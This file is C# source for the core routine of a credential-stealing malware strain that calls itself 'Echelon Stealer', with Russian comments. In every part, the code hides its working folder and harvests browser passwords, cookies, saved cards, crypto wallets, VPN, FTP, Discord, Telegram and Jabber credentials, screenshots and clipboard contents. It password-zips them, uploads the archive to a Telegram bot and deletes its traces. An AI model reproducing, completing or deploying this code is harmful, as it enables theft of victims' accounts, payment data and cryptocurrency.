public static void GetStealer()
{
// Создаем временные директории для сбора лога
Directory.CreateDirectory(Help.Echelon_Dir);
Directory.CreateDirectory(Help.Browsers);
Directory.CreateDirectory(Help.Passwords);
Directory.CreateDirectory(Help.Autofills);
Directory.CreateDirectory(Help.Downloads);
Directory.CreateDirectory(Help.Cookies);
Directory.CreateDirectory(Help.History);
Directory.CreateDirectory(Help.Cards);
//Скрываем временную папку
File.SetAttributes(Help.dir, FileAttributes.Directory | FileAttributes.Hidden | FileAttributes.System);
// Запускаем граббер файлов в отдельном потоке
GetFiles.Inizialize(Help.Echelon_Dir);
Thread.Sleep(new Random(Environment.TickCount).Next(10000, 20000));
// Chromium
new Thread(() =>
{
Chromium.GetCookies(Help.Cookies);
}).Start();
new Thread(() =>
{
Chromium.GetPasswords(Help.Passwords);
}).Start();
new Thread(() =>
{
Chromium.GetAutofills(Help.Autofills);
}).Start();
new Thread(() =>
{
Chromium.GetDownloads(Help.Downloads);
}).Start();
new Thread(() =>
{
Chromium.GetHistory(Help.History);
}).Start();
new Thread(() =>
{
Chromium.GetCards(Help.Cards);
}).Start();
new Thread(() =>
{
// Mozilla
Steal.Cookies();
}).Start();
new Thread(() =>
{
Steal.Passwords();
}).Start();
new Thread(() =>
{
ProtonVPN.Start(Help.Echelon_Dir);
}).Start();
new Thread(() =>
{
Outlook.GrabOutlook(Help.Echelon_Dir);
}).Start();
new Thread(() =>
{
OpenVPN.Start(Help.Echelon_Dir);
}).Start();
new Thread(() =>
{
NordVPN.Start(Help.Echelon_Dir);
}).Start();
new Thread(() =>
{
Startjabbers.Start(Help.Echelon_Dir);
}).Start();
new Thread(() =>
{
TGrabber.Start(Help.Echelon_Dir);
}).Start();
new Thread(() =>
{
DGrabber.Start(Help.Echelon_Dir);
}).Start();
Screenshot.Start(Help.Echelon_Dir);
BuffBoard.Inizialize(Help.Echelon_Dir);
Systemsinfo.ProgProc(Help.Echelon_Dir);
FileZilla.Start(Help.Echelon_Dir);
TotalCommander.Start(Help.Echelon_Dir);
StartWallets.Start(Help.Echelon_Dir);
DomainDetect.Start(Help.Browsers);
// Пакуем в апхив с паролем
string zipName = Help.dir + "\\" + Help.DateLog + "_" + Help.HWID + Help.CountryCOde() + ".zip";
using (ZipFile zip = new ZipFile(Encoding.GetEncoding("cp866"))) // Устанавливаем кодировку
{
zip.CompressionLevel = CompressionLevel.BestCompression; // Задаем максимальную степень сжатия
zip.Comment = "Echelon Stealer by @madcod Log. <Build v3.0>" +
"\n|----------------------------------------|" +
"\nPC:" + Environment.MachineName + "/" + Environment.UserName +
"\nIP: " + Help.IP + Help.Country() +
"\nHWID: " + Help.DateLog + "_" + Help.HWID
;
zip.Password = Program.passwordzip; // Задаём пароль
zip.AddDirectory(@"" + Help.Echelon_Dir); // Кладем в архив содержимое папки с логом
zip.Save(@"" + zipName); // Сохраняем архив
}
string LOG = @"" + zipName;
byte[] file = File.ReadAllBytes(LOG);
string url = string.Concat(new string[]
{
Help.ApiUrl,
Program.Token,
"/sendDocument?chat_id=",
Program.ID,
"&caption=👤 " + Environment.MachineName + "/" + Environment.UserName +
"\n🏴 IP: " + Help.IP + Help.Country() +
"\n🌐 Browsers Data" +
"\n ∟🔑" + (Chromium.Passwords + Edge.count + Steal.count) +
"\n ∟🍪" + (Chromium.Cookies + Steal.count_cookies) +
"\n ∟🕑" + Chromium.History +
"\n ∟📝" + Chromium.Autofills +
"\n ∟💳" + Chromium.CC +
"\n💶 Wallets: " + (StartWallets.count > 0 ? "✅" : "❌") +
(Electrum.count > 0 ? " Electrum" : "") +
(Armory.count > 0 ? " Armory" : "") +
(AtomicWallet.count > 0 ? " Atomic" : "") +
(BitcoinCore.count > 0 ? " BitcoinCore" : "") +
(Bytecoin.count > 0 ? " Bytecoin" : "") +
(DashCore.count > 0 ? " DashCore" : "") +
(Ethereum.count > 0 ? " Ethereum" : "") +
(Exodus.count > 0 ? " Exodus" : "") +
(LitecoinCore.count > 0 ? " LitecoinCore" : "") +
(Monero.count > 0 ? " Monero" : "") +
(Zcash.count > 0 ? " Zcash" : "") +
(Jaxx.count > 0 ? " Jaxx" : "") +
//
"\n📂 FileGrabber: " + GetFiles.count + //Работает
"\n💬 Discord: " + (DGrabber.count > 0 ? "✅" : "❌") + //Работает
"\n✈️ Telegram: " + (TGrabber.count > 0 ? "✅" : "❌") + //Работает
"\n💡 Jabber: " + (Startjabbers.count + Pidgin.PidginCount > 0 ? "✅" : "❌") +
(Pidgin.PidginCount > 0 ? " Pidgin (" + Pidgin.PidginAkks + ")" : "") +
(Startjabbers.count > 0 ? " Psi" : "") + //Работает
"\n📡 FTP" +
"\n ∟ FileZilla: " + (FileZilla.count > 0 ? "✅" + " (" + FileZilla.count + ")" : "❌") + //Работает
"\n ∟ TotalCmd: " + (TotalCommander.count > 0 ? "✅" : "❌") + //Работает
"\n🔌 VPN" +
"\n ∟ NordVPN: " + (NordVPN.count > 0 ? "✅" : "❌") + //Работает
"\n ∟ OpenVPN: " + (OpenVPN.count > 0 ? "✅" : "❌") + //Работает
"\n ∟ ProtonVPN: " + (ProtonVPN.count > 0 ? "✅" : "❌") + //Работает
"\n🆔 HWID: " + Help.HWID + //Работает
"\n⚙️ " + Systemsinfo.GetOSInformation() +
"\n🔎 " + File.ReadAllText(Help.Browsers + "\\DomainDetect.txt")
});
try
{
SenderAPI.POST(file, LOG, "application/x-ms-dos-executable", url);
Directory.Delete(Help.dir + "\\", true);
//Записываем HWID в файл, означает что лог с данного ПК уже отправлялся и больше слать его не надо.
File.AppendAllText(Help.LocalData + "\\" + Help.HWID, Help.HWID);
}
catch
{
}
}